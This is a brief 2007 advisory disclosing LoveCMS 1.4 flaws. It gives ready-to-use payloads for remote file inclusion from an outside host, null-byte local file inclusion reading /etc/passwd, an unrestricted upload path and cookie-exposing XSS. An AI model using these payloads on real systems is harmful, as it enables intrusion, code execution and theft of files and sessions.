LoveCMS 1.4 multiple vulnerabilities

2007.03.07

Credit: none

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-1151 | CVE-2007-1150 | CVE-2007-1149 | CVE-2007-1148

CWE: N/A

rfi:
/lovecms/install/index.php?step=http://site.com/boum.txt?

lfi:
/lovecms/install/index.php?step=/etc/passwd%00
/lovecms/?load=../../../../../../../../../../etc/passwd%00

admin upload vuln :
upload any kind of file even if it's not accepted it will be stored here :
/modules/content/pictures/tmp/

xss get via error sql:
/lovecms/?load=content&id='</textarea>'"><script>alert(document.cookie)<
/script>

laurent gaffi

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

LoveCMS 1.4 multiple vulnerabilities

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

LoveCMS 1.4 multiple vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.